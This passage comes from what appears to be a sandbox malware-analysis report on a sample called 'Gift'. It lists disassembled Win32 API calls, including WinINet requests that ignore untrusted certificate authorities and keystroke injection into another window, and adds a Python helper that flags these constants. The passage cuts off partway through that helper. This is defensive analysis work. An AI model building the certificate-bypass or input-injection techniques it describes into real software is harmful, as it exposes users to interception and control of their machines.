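              f"unresolved={unresolved_ratio(entry):.2f}")
        for api, note in hints.items():
            print(f"  {api}: {note}")
```

Feed it the plain-text export of a report section and the per-function counters line up with the "API ID" groupings Joe Sandbox prints, which makes it easy to grep a large dump for the functions that touch thread input, COM monikers or window enumeration.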
                                                                          APIs
                                                                          • GetSysColor.USER32(00000008), ref: 002D260D
                                                                          • SetTextColor.GDI32(?,000000FF), ref: 002D2617
                                                                          • SetBkMode.GDI32(?,00000001), ref: 002D262C
                                                                          • GetStockObject.GDI32(00000005), ref: 002D2634
                                                                          • GetClientRect.USER32(?), ref: 0030C0FC
                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0030C113
                                                                          • GetWindowDC.USER32(?), ref: 0030C11F
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0030C12E
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0030C140
                                                                          • GetSysColor.USER32(00000005), ref: 0030C15E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                          • String ID:
                                                                          • API String ID: 3430376129-0
                                                                          • Opcode ID: 3c15a3f90f3fdbe8831ecc097e0586942310476641b90cb5b50d312f13b6dc3f
                                                                          • Instruction ID: d3a3c8138e44f2da43f8bad10615c28c99a26c3d6b63b9103c6073771c2b96ce
                                                                          • Opcode Fuzzy Hash: 3c15a3f90f3fdbe8831ecc097e0586942310476641b90cb5b50d312f13b6dc3f
                                                                          • Instruction Fuzzy Hash: D611BE31110205FFDB265FB4EC0ABEA7BB9EB19321F108261FA66941E1CBB10D60EF10
                                                                          APIs
                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002DADE1
                                                                          • OleUninitialize.OLE32(?,00000000), ref: 002DAE80
                                                                          • UnregisterHotKey.USER32(?), ref: 002DAFD7
                                                                          • DestroyWindow.USER32(?), ref: 00312F64
                                                                          • FreeLibrary.KERNEL32(?), ref: 00312FC9
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00312FF6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                          • String ID: close all
                                                                          • API String ID: 469580280-3243417748
                                                                          • Opcode ID: 64961ffe08adcd148fc39deb767f833c97cb2f408ce3bcf686e6e81af1a07481
                                                                          • Instruction ID: cdf88965ee96d4fb8a53dae5171754b94c726e5a242727d6b2dcfb3d984ac057
                                                                          • Opcode Fuzzy Hash: 64961ffe08adcd148fc39deb767f833c97cb2f408ce3bcf686e6e81af1a07481
                                                                          • Instruction Fuzzy Hash: 3BA16F707112128FCB2AEF14C595E6AF3A4FF08740F5142ADE90AAB351CB31AD66CF91
                                                                          APIs
                                                                          • EnumChildWindows.USER32(?,0032B13A), ref: 0032B078
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ChildEnumWindows
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 3555792229-1603158881
                                                                          • Opcode ID: c83f83ec79d652945561658d4fdd14ab3d9b0b1a7449409d1782adfaffcdeb47
                                                                          • Instruction ID: 6e7341379ab44749e46a37df42c5aaf422fe217a0aedc66ec5aca05fb98f08a3
                                                                          • Opcode Fuzzy Hash: c83f83ec79d652945561658d4fdd14ab3d9b0b1a7449409d1782adfaffcdeb47
                                                                          • Instruction Fuzzy Hash: F791F970500A25EBDB1AEF60D881BEEFB75FF04340F508129E95AA7152DF306969CBA1
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 002D327E
                                                                            • Part of subcall function 002D218F: GetClientRect.USER32(?,?), ref: 002D21B8
                                                                            • Part of subcall function 002D218F: GetWindowRect.USER32(?,?), ref: 002D21F9
                                                                            • Part of subcall function 002D218F: ScreenToClient.USER32(?,?), ref: 002D2221
                                                                          • GetDC.USER32 ref: 0030D073
                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0030D086
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0030D094
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0030D0A9
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0030D0B1
                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0030D13C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                          • String ID: U
                                                                          • API String ID: 4009187628-3372436214
                                                                          • Opcode ID: d2d54a7134f1e5e339536bf0668b44bd425a67bb3e0e852a3134f3bc3e2284b6
                                                                          • Instruction ID: f9f2473b9d9cfac3f45de544196e7985225a4f2ceb37af700d36254db7cf251e
                                                                          • Opcode Fuzzy Hash: d2d54a7134f1e5e339536bf0668b44bd425a67bb3e0e852a3134f3bc3e2284b6
                                                                          • Instruction Fuzzy Hash: D9710030805205EFCF26CFA4C895ABA7BB9FF49320F14426AED595A2A6C7318C51DF61
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                            • Part of subcall function 002D2714: GetCursorPos.USER32(?), ref: 002D2727
                                                                            • Part of subcall function 002D2714: ScreenToClient.USER32(003977B0,?), ref: 002D2744
                                                                            • Part of subcall function 002D2714: GetAsyncKeyState.USER32(00000001), ref: 002D2769
                                                                            • Part of subcall function 002D2714: GetAsyncKeyState.USER32(00000002), ref: 002D2777
                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0035C69C
                                                                          • ImageList_EndDrag.COMCTL32 ref: 0035C6A2
                                                                          • ReleaseCapture.USER32 ref: 0035C6A8
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0035C752
                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0035C765
                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0035C847
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 1924731296-2107944366
                                                                          • Opcode ID: c6e355420139dfed3d5817007d767898ff7e4deb32a6a2791022ed66d90adfae
                                                                          • Instruction ID: 14352d31b42a7fff54939477211008bcf0a341852bc3586deabf0a2e0b22190d
                                                                          • Opcode Fuzzy Hash: c6e355420139dfed3d5817007d767898ff7e4deb32a6a2791022ed66d90adfae
                                                                          • Instruction Fuzzy Hash: 3851AE70118304AFDB16EF14CC5AF6A77E5EB84314F00891AF995872E1CB71A958CF52
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0034211C
                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00342148
                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0034218A
                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0034219F
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003421AC
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003421DC
                                                                          • InternetCloseHandle.WININET(00000000), ref: 00342223
                                                                            • Part of subcall function 00342B4F: GetLastError.KERNEL32(?,?,00341EE3,00000000,00000000,00000001), ref: 00342B64
                                                                            • Part of subcall function 00342B4F: SetEvent.KERNEL32(?,?,00341EE3,00000000,00000000,00000001), ref: 00342B79
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                          • String ID:
                                                                          • API String ID: 2603140658-3916222277
                                                                          • Opcode ID: 0f153682b0d3f9d117e6b51f09ae3df64d87bdef5102b2edf84d3645a5cac294
                                                                          • Instruction ID: 6370b73002df7bf11f4a974ba2daa5ac4861c4bb3e6c1e2f263bad8d61e25278
                                                                          • Opcode Fuzzy Hash: 0f153682b0d3f9d117e6b51f09ae3df64d87bdef5102b2edf84d3645a5cac294
                                                                          • Instruction Fuzzy Hash: A7415DB1501218BFEB179F50CC8AFBB7BACEF08354F408116FA05AE151D7B0AE549BA1
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00360980), ref: 00349412
                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00360980), ref: 00349446
                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003495C0
                                                                          • SysFreeString.OLEAUT32(?), ref: 003495EA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                          • String ID:
                                                                          • API String ID: 560350794-0
                                                                          • Opcode ID: e5cf6ac52f6123143428e94e8997bfea12a988165f0cf027ed4bfa40e0035b0e
                                                                          • Instruction ID: 3d9b9d9d8d881e6ab1f00636afd7bdd2c6bc231b796a149af7be4cbb103ddf64
                                                                          • Opcode Fuzzy Hash: e5cf6ac52f6123143428e94e8997bfea12a988165f0cf027ed4bfa40e0035b0e
                                                                          • Instruction Fuzzy Hash: 01F12A71A00219EFCB16DF94C884EAEB7B9FF49314F118499F506AF261DB31AE45CB90
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0034FD9E
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0034FF31
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0034FF55
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034FF95
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034FFB7
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00350133
                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00350165
                                                                          • CloseHandle.KERNEL32(?), ref: 00350194
                                                                          • CloseHandle.KERNEL32(?), ref: 0035020B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                          • String ID:
                                                                          • API String ID: 4090791747-0
                                                                          • Opcode ID: f975f3e133089c80e30f2c1cb2f6d54151ce373b7304459ef062f119e39d5dfd
                                                                          • Instruction ID: ada121a8383e47704eef954f66bb0b02c696e2305fab71af4c7060ca1b14e3f3
                                                                          • Opcode Fuzzy Hash: f975f3e133089c80e30f2c1cb2f6d54151ce373b7304459ef062f119e39d5dfd
                                                                          • Instruction Fuzzy Hash: 00E1B131204341DFC71AEF24C891A6ABBE5AF85354F19886DF9859F2A2CB31EC45CF52
                                                                          APIs
                                                                            • Part of subcall function 00334BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00333B8A,?), ref: 00334BE0
                                                                            • Part of subcall function 00334BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00333B8A,?), ref: 00334BF9
                                                                            • Part of subcall function 00334FEC: GetFileAttributesW.KERNEL32(?,00333BFE), ref: 00334FED
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003352FB
                                                                          • _wcscmp.LIBCMT ref: 00335315
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00335330
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 793581249-0
                                                                          • Opcode ID: 40df2a3e11fcaea317460cb5cda8d7e81f66f572bac3b2e98e0c98811c05f492
                                                                          • Instruction ID: 9c222951c7a18f6a0c7c25d6d76b665b3e27f8d39b0dbcfca50533d3ee2059f5
                                                                          • Opcode Fuzzy Hash: 40df2a3e11fcaea317460cb5cda8d7e81f66f572bac3b2e98e0c98811c05f492
                                                                          • Instruction Fuzzy Hash: A35186B20087859BC725DBA0D8819DFB3EC9F84341F50492EF685D7152EF74A688CB66
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00358D24
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 76d20b515df33c7875a1801b3e3923fe7d4c571f3713537ae41a02751d1c6a3c
                                                                          • Instruction ID: 5a91f15e1b50a778bd722db94f873b0f62631c3f9fa3d16d20cc0b35a0e18b47
                                                                          • Opcode Fuzzy Hash: 76d20b515df33c7875a1801b3e3923fe7d4c571f3713537ae41a02751d1c6a3c
                                                                          • Instruction Fuzzy Hash: 9D51B130601204BFEB269F24CC8AF597BB8EB15352F244512FD15FA1F1CB71A9988A90
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0030C638
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0030C65A
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0030C672
                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0030C690
                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0030C6B1
                                                                          • DestroyIcon.USER32(00000000), ref: 0030C6C0
                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0030C6DD
                                                                          • DestroyIcon.USER32(?), ref: 0030C6EC
                                                                            • Part of subcall function 0035AAD4: DeleteObject.GDI32(00000000), ref: 0035AB0D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 2819616528-0
                                                                          • Opcode ID: 3b1988086a6d686e8289bf4ccbe12ad2b470a26768446dee244e01277c010837
                                                                          • Instruction ID: 528c4b76785ef4b4329ef88d05799ab141342141ff6bb030ce7243d58777f585
                                                                          • Opcode Fuzzy Hash: 3b1988086a6d686e8289bf4ccbe12ad2b470a26768446dee244e01277c010837
                                                                          • Instruction Fuzzy Hash: EC51AE70620209EFDB25DF24CC96BAA77B9EB54310F104A19F942D76E0D7B1EC60DB60
                                                                          APIs
                                                                            • Part of subcall function 0032B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0032B54D
                                                                            • Part of subcall function 0032B52D: GetCurrentThreadId.KERNEL32 ref: 0032B554
                                                                            • Part of subcall function 0032B52D: AttachThreadInput.USER32(00000000,?,0032A23B,?,00000001), ref: 0032B55B
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0032A246
                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0032A263
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0032A266
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0032A26F
                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0032A28D
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0032A290
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0032A299
                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0032A2B0
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0032A2B3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                          • String ID:
                                                                          • API String ID: 2014098862-0
                                                                          • Opcode ID: 07b8a1662370d414fc9a8534813775f8c740aa5928fdf755d4bd8555d4dfec9f
                                                                          • Instruction ID: bf4ccbff1009bec45ba2f12d6fdae0c80dd28d05de96446fab25cd85570620a4
                                                                          • Opcode Fuzzy Hash: 07b8a1662370d414fc9a8534813775f8c740aa5928fdf755d4bd8555d4dfec9f
                                                                          • Instruction Fuzzy Hash: D011CEB1950618BFF6116B60DC8AF6B7B2DEB4D751F204819F2406B090CAF25C509AA0
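The two records above that matter most for triage are the WinINet request function (ref 0034211C to 00342223) and the keystroke-injection function (ref 0032A246 to 0032A2B3). Their arguments are printed as raw hex, so the security-relevant constants are easy to miss: option 0000001F passed to InternetSetOptionW is INTERNET_OPTION_SECURITY_FLAGS and the value 00000100 is SECURITY_FLAG_IGNORE_UNKNOWN_CA (the function accepts server certificates from an untrusted CA), 00000005 in HttpQueryInfoW is HTTP_QUERY_CONTENT_LENGTH, and the PostMessageW calls post WM_KEYDOWN (00000100) / WM_KEYUP (00000101) for VK_LEFT (00000025) and VK_RIGHT (00000027) into a window whose thread has been joined with AttachThreadInput. (The string IDs @GUI_DRAGFILE and @GUI_DROPID in the first record are AutoIt macro names, which is consistent with an AutoIt-compiled wrapper.) The following script is an added triage helper, not part of the Joe Sandbox report or of any tool of Joe Security: it parses lines in the report's "• Api.MODULE(args), ref: ADDR" format and decodes those constants. The sample input is constructed from the lines of the two records; the rule set and the finding wording are this example's own choices.

```python
"""Decode security-relevant Win32 constants in Joe Sandbox 'APIs' records.

Added example, not part of the report.  Input lines look like
  "• Api.MODULE(arg,arg,...), ref: ADDR"   ('?' = argument not resolved)
  "  • Part of subcall function XXXX: Api.MODULE(...), ref: ADDR"
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: entries copied from the WinINet record and the
# keystroke-injection record in the report above.
SAMPLE = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0034211C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00342148
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0034218A
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0034219F
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003421AC
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003421DC
  • Part of subcall function 0032B52D: AttachThreadInput.USER32(00000000,?,0032A23B,?,00000001), ref: 0032B55B
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0032A246
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0032A263
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0032A2B0
"""

CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants, values as defined in wininet.h / winuser.h.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
IGNORE_FLAGS = {
    0x0100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x0200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
HTTP_QUERY_CONTENT_LENGTH = 0x05
WM_KEYDOWN, WM_KEYUP = 0x100, 0x101
VK_NAMES = {0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}


@dataclass
class Call:
    api: str
    module: str
    args: list               # int for a resolved constant, None for '?'
    ref: int                 # address of the call site
    subcall: Optional[str]   # callee address for 'Part of subcall function' entries


def _arg(tok: str) -> Optional[int]:
    try:
        return int(tok.strip(), 16)
    except ValueError:
        return None          # '?' or anything else the disassembler left unresolved


def parse_calls(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_arg(a) for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), m.group("sub")))
    return calls


def triage(calls: list) -> list:
    """Return one human-readable finding per security-relevant pattern."""
    findings, keys = [], []
    for c in calls:
        a = c.args
        if (c.api == "InternetSetOptionW" and len(a) >= 3
                and a[1] == INTERNET_OPTION_SECURITY_FLAGS and a[2] is not None):
            names = [n for bit, n in IGNORE_FLAGS.items() if a[2] & bit]
            if names:
                findings.append(f"{c.ref:08X}: TLS certificate checks disabled: {', '.join(names)}")
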